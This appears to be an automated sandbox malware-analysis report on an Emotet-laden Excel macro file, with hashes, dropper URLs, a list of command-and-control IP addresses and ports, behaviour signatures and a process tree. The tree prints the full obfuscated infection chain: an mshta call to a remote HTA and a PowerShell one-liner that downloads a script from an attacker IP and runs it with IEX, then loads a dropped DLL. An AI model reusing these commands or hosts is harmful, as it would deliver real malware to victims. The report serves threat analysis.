Analysis

  • max time kernel
    150s
  • max time network
    138s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    20-01-2022 08:21

General

  • Target

    707712.xlsm

  • Size

    115KB

  • MD5

    f4d25cf8a129a7d5f017c7ff90e768fd

  • SHA1

    5e5faa43a14365d234bd071f1ae2b9fcd3511ec0

  • SHA256

    bc7476f9d9148b939127a2024a1b341cec82fb398bf06667bdd3da4b1acc8bd2

  • SHA512

    51ed9a545b67f3296a06d0f1ed570a7caed45a9fa3adf20fad21bf8a40b576015d656f3cf7c117d354ece81006bcb268ca76ed04e30543e5e5237151234d8ea1

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://0x5cff39c3/sec/se1.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://92.255.57.195/sec/se1.png

Extracted

Family

emotet

Botnet

Epoch5

C2

45.138.98.34:80

69.16.218.101:8080

51.210.242.234:8080

185.148.168.220:8080

142.4.219.173:8080

54.38.242.185:443

191.252.103.16:80

104.131.62.48:8080

62.171.178.147:8080

217.182.143.207:443

168.197.250.14:80

37.44.244.177:8080

66.42.57.149:443

210.57.209.142:8080

159.69.237.188:443

116.124.128.206:8080

128.199.192.135:8080

195.154.146.35:443

185.148.168.15:8080

195.77.239.39:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 8 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 8 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 32 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 48 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\707712.xlsm
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1892
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1032
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c m^sh^t^a h^tt^p^:/^/0x5cff39c3/sec/se1.html
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:1976
        • C:\Windows\SysWOW64\mshta.exe
          mshta http://0x5cff39c3/sec/se1.html
          3⤵
          • Blocklisted process makes network request
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:1156
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://92.255.57.195/sec/se1.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
            4⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1904
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1324
              • C:\Windows\SysWow64\rundll32.exe
                C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
                6⤵
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:1744
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
                  7⤵
                  • Loads dropped DLL
                  • Drops file in System32 directory
                  • Suspicious use of WriteProcessMemory
                  PID:1616
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Zoywemicxoy\fkoukwyyavvhpf.ghu",zGbZVfeqKwAzx
                    8⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1472
                    • C:\Windows\SysWOW64\rundll32.exe
                      C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Zoywemicxoy\fkoukwyyavvhpf.ghu",DllRegisterServer
                      9⤵
                      • Blocklisted process makes network request
                      • Suspicious behavior: EnumeratesProcesses
                      PID:924

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/924-99-0x00000000008A0000-0x00000000008C8000-memory.dmp

      Filesize

      160KB

    • memory/924-116-0x0000000002A80000-0x0000000002AA8000-memory.dmp

      Filesize

      160KB

    • memory/924-115-0x0000000002A81000-0x0000000002AA5000-memory.dmp

      Filesize

      144KB

    • memory/924-113-0x0000000002A20000-0x0000000002A48000-memory.dmp

      Filesize

      160KB

    • memory/924-111-0x0000000002970000-0x0000000002998000-memory.dmp

      Filesize

      160KB

    • memory/924-109-0x0000000002730000-0x0000000002758000-memory.dmp

      Filesize

      160KB

    • memory/924-107-0x0000000002630000-0x0000000002658000-memory.dmp

      Filesize

      160KB

    • memory/924-105-0x00000000024F0000-0x0000000002518000-memory.dmp

      Filesize

      160KB

    • memory/924-103-0x0000000002450000-0x0000000002478000-memory.dmp

      Filesize

      160KB

    • memory/924-97-0x00000000006B0000-0x00000000006D8000-memory.dmp

      Filesize

      160KB

    • memory/1032-58-0x000007FEFB591000-0x000007FEFB593000-memory.dmp

      Filesize

      8KB

    • memory/1472-93-0x0000000000160000-0x0000000000188000-memory.dmp

      Filesize

      160KB

    • memory/1616-87-0x00000000026B0000-0x00000000026D8000-memory.dmp

      Filesize

      160KB

    • memory/1616-81-0x0000000000850000-0x0000000000878000-memory.dmp

      Filesize

      160KB

    • memory/1616-89-0x00000000027C0000-0x00000000027E8000-memory.dmp

      Filesize

      160KB

    • memory/1616-92-0x0000000002820000-0x0000000002848000-memory.dmp

      Filesize

      160KB

    • memory/1616-85-0x0000000002510000-0x0000000002538000-memory.dmp

      Filesize

      160KB

    • memory/1616-83-0x0000000000920000-0x0000000000948000-memory.dmp

      Filesize

      160KB

    • memory/1616-79-0x0000000000130000-0x0000000000158000-memory.dmp

      Filesize

      160KB

    • memory/1744-72-0x00000000002F0000-0x0000000000318000-memory.dmp

      Filesize

      160KB

    • memory/1892-54-0x000000002FD31000-0x000000002FD34000-memory.dmp

      Filesize

      12KB

    • memory/1892-55-0x0000000070E31000-0x0000000070E33000-memory.dmp

      Filesize

      8KB

    • memory/1892-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1892-57-0x00000000751B1000-0x00000000751B3000-memory.dmp

      Filesize

      8KB

    • memory/1904-65-0x0000000004C40000-0x0000000005291000-memory.dmp

      Filesize

      6.3MB

    • memory/1904-63-0x00000000023C0000-0x000000000300A000-memory.dmp

      Filesize

      12.3MB

    • memory/1904-64-0x00000000023C0000-0x000000000300A000-memory.dmp

      Filesize

      12.3MB